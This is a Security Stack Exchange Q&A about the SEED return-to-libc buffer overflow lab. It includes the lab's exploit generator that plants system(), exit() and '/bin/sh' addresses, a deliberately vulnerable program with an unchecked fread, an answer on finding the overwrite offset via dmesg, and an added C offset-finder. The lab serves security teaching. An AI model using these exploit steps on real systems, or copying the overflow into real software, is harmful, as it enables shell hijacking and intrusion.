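I am trying to find the buffer to carry out a buffer overflow attack.

The lab link is also here: https://seedsecuritylabs.org/Labs_16.04/PDF/Return_to_Libc.pdf

How do I find X in a libc attack with a buffer size of 150? This is the attack code provided to us. I have already found the addresses that need to be written into the buffer, but I just need X: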

    #include <stdlib.h>
    #include <stdio.h>
    #include <string.h>

    int main(int argc, char **argv) {
        char buf[40];
        FILE *badfile;

        badfile = fopen("./badfile", "w");

        /* You need to decide the addresses and the values for X, Y, Z.
           The order of the following three statements does not imply the
           order of X, Y, Z. Actually, we intentionally scrambled the order. */
        *(long *) &buf[X] = 0xbffffdd4; // /bin/sh
        *(long *) &buf[Y] = 0xb7e42da0; // system()
        *(long *) &buf[Z] = 0xb7e369d0; // exit()

        fwrite(buf, sizeof(buf), 1, badfile);
        fclose(badfile);
    }

This is also the vulnerable program given to us:

    #include <stdlib.h>
    #include <stdio.h>
    #include <string.h>

    /* Changing this size will change the layout of the stack.
     * Instructors can change this value each year, so students
     * won't be able to use the solutions from the past.
     * Suggested value: between 0 and 200 (cannot exceed 300, or
     * the program won't have a buffer-overflow problem). */
    #ifndef BUF_SIZE
    #define BUF_SIZE 150
    #endif

    int bof(FILE *badfile) {
        char buffer[BUF_SIZE];

        /* The following statement has a buffer overflow problem */
        fread(buffer, sizeof(char), 300, badfile);

        return 1;
    }

    int main(int argc, char **argv) {
        FILE *badfile;

        /* Change the size of the dummy array to randomize the parameters
           for this lab. Need to use the array at least once */
        char dummy[BUF_SIZE*5];
        memset(dummy, 0, BUF_SIZE*5);

        badfile = fopen("badfile", "r");
        bof(badfile);

        printf("Returned Properly\n");

        fclose(badfile);
        return 1;
    }

Posted on 2020-04-02 02:58:55
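
A simple way to do this is to use an input of the form 'a'*BUFF_SIZE + 'qwertyuiopasdfghjklzxcvbnm'. The return address will be overwritten by 4 consecutive characters from that string (assuming a 32-bit system). Run your program with this input, and it will naturally produce a segmentation fault. Use dmesg | tail to find the address it jumped to. Say it comes out as zlkj. So now you have the offset. Just replace jklz with the address you want to jump to. While replacing the address, be sure to take care of the endianness.
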
https://security.stackexchange.com/questions/229105
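
The marker-string lookup described in the answer, as an added example that is not part of the original post or the lab material. The function names `build_input` and `fault_to_offset` are hypothetical, and the sample fault address is constructed from the answer's own "jklz" illustration, not measured on the lab program.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Marker string from the answer; every 4-byte window in it is unique. */
static const char MARKER[] = "qwertyuiopasdfghjklzxcvbnm";

/* Write pad 'a' bytes followed by MARKER into out.
 * Returns the total length, or 0 if it does not fit in cap bytes. */
size_t build_input(char *out, size_t cap, size_t pad) {
    size_t mlen = strlen(MARKER);
    if (pad + mlen > cap) return 0;
    memset(out, 'a', pad);
    memcpy(out + pad, MARKER, mlen);
    return pad + mlen;
}

/* Map the 32-bit fault address reported in the dmesg segfault line to the
 * input offset of the 4 bytes that overwrote the return address.
 * x86 is little-endian, so the low byte of the address is the first byte
 * in the file. Returns -1 when the bytes are not a window of MARKER, e.g.
 * 0x61616161 ("aaaa") means the return address lies inside the padding. */
long fault_to_offset(uint32_t ip, size_t pad) {
    char win[4];
    size_t mlen = strlen(MARKER);
    for (int i = 0; i < 4; i++)
        win[i] = (char)((ip >> (8 * i)) & 0xff);
    /* memcmp, not strstr: a fault address may contain zero bytes. */
    for (size_t i = 0; i + 4 <= mlen; i++)
        if (memcmp(MARKER + i, win, 4) == 0)
            return (long)(pad + i);
    return -1;
}

int main(void) {
    char buf[300];
    size_t n = build_input(buf, sizeof buf, 150);
    /* Constructed sample: memory-order bytes "jklz" read as one 32-bit word. */
    uint32_t ip = 0x7a6c6b6a;
    printf("input length: %zu\n", n);
    printf("0x%08x -> input offset %ld\n", (unsigned)ip, fault_to_offset(ip, 150));
    return 0;
}
```
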